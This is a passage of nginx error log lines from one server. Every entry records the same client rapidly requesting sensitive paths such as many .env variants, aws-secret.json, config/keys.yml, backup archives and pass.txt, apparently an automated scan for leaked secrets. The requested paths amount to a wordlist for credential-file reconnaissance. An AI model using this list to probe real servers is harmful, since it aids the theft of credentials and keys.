[error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /api/debug HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:47 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /api/docs/ HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:47 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /api/env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:47 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /api/info.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:47 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /api/internal/ HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:47 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /api/keys HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:47 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /api/private/ HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:48 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /api/src/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:48 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /api/v1/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:48 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /api/v1/debug HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:48 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /api/v2/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:48 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /apis/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:48 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /app-7d66de919618d3830635.js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:48 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /app-order-client/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:48 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /app.yaml HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:48 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /app/.env.example HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:48 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /app/.env.sample HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:48 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /app/.env.save HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:48 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /app//.env.back HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:48 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /app/client/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:48 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /app/code/community/Nosto/Tagging/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:48 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /app/config.js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:48 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /app/config/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:48 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /app/config/dev/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:48 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /app/frontend/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:48 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /app/info HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:48 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /app/info.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:48 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /app1-static/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:48 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /app2-static/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:48 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /app_dir/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:48 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /app_nginx_static_path/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:48 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /application/.env.sample HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:48 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /application/.env.save HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:48 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /apps/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:48 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /apps/client/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:48 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /Archipel/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:48 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /asdf.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:48 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /asset_img/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:48 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /assets/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:48 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /assets/index-[hash].js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:48 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /assets/index-[hash].mjs HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:48 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /assets/index-GquDNGwd.js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:48 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /assets/js/app.f8ec9fb3.js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:48 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /assets/js/app.js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:48 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /assets/vendor-[hash].js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:49 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /Assignment3/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:49 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /Assignment4/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:49 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /audio/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:49 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /aws-secret.json HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:49 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /aws.yml HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:49 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /aws/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:49 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /azure/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:49 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /babel-plugin-dotenv/test/fixtures/as-alias/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:49 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /babel-plugin-dotenv/test/fixtures/default/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:49 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /babel-plugin-dotenv/test/fixtures/dev-env/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:49 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /babel-plugin-dotenv/test/fixtures/empty-values/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:49 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /babel-plugin-dotenv/test/fixtures/filename/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:49 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /babel-plugin-dotenv/test/fixtures/override-value/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:49 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /babel-plugin-dotenv/test/fixtures/prod-env/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:49 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /back-end/app/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:49 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /back/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:49 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /backend/.env.local HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:49 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /backend/config/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:49 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /backend/debug HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:49 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /backend/src/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:49 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /backendfinaltest/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:49 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /backup.tar.gz HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:49 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /backup.zip HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:49 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /base_dir/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:49 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /basic-network/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:49 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /bgoldd/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:49 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /bitcoind/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:49 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /blankon/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:49 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /blob/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:49 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /blog/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:49 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /blogs/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:49 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /blue/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:49 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /bookchain-client/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:49 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /Booking/Default.aspx HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:49 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /bootstrap/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:49 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /boxes/oracle-vagrant-boxes/ContainerRegistry/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:49 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /boxes/oracle-vagrant-boxes/Kubernetes/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:49 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /boxes/oracle-vagrant-boxes/OLCNE/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:49 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /bucoffea/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:50 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /build.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:50 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /build/ HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:50 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /build/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:50 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /build/_app/immutable/chunks/[chunk].[hash].js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:50 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /build/_app/immutable/entry/app.[hash].js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:50 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /build/entry.client-[hash].js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:50 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /build/main.ba0c34b7.js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:50 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /build/routes/index-[hash].js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:50 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /cache.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:50 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /cardea/backend/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:50 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /cdw-backend/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:50 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /cgi-bin/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:50 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /cgi-bin/pass.txt HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:50 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /ch2-mytodo/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:50 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /ch6-mytodo/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:50 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /ch6a-mytodo/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:50 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /ch7-mytodo/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:50 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /ch7a-mytodo/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:50 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /ch8-mytodo/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:50 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /ch8a-mytodo/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:50 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /ch8b-mytodo/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:50 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /Chai/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:50 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /challenge/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:50 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /challenges/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:50 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /charts/liveObjects/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:50 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /chat-client/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:50 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /chiminey/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:50 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /chunk-B2FODB4I.js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:50 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /ci/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:50 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /client-app/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:50 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /client/mutual-fund-app/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:50 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /client/src/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:50 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /ClientApp/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:50 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /clld_dir/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:50 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /cloud/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:50 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /cmd/testdata/expected/dot_env/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:50 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /code/api/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:50 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /code/web/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:51 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /CodeGolf.Web/ClientApp/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:51 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /codenames-frontend/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:51 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /collab-connect-web-application/server/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:51 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /collected_static/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:51 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /community/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:51 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /compose/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:51 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /config.js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:51 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /config.yaml HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:51 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /config/.env.dev HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:51 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /config/.env.local HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:51 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /config/.env.production HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:51 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /config/aws.yml HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:51 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /config/cache.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:51 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /config/config.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:51 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /config/config.yml HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:51 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /config/default.json HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:51 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /config/keys.yml HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:51 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /config/production.json HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:51 [error] 309#309: 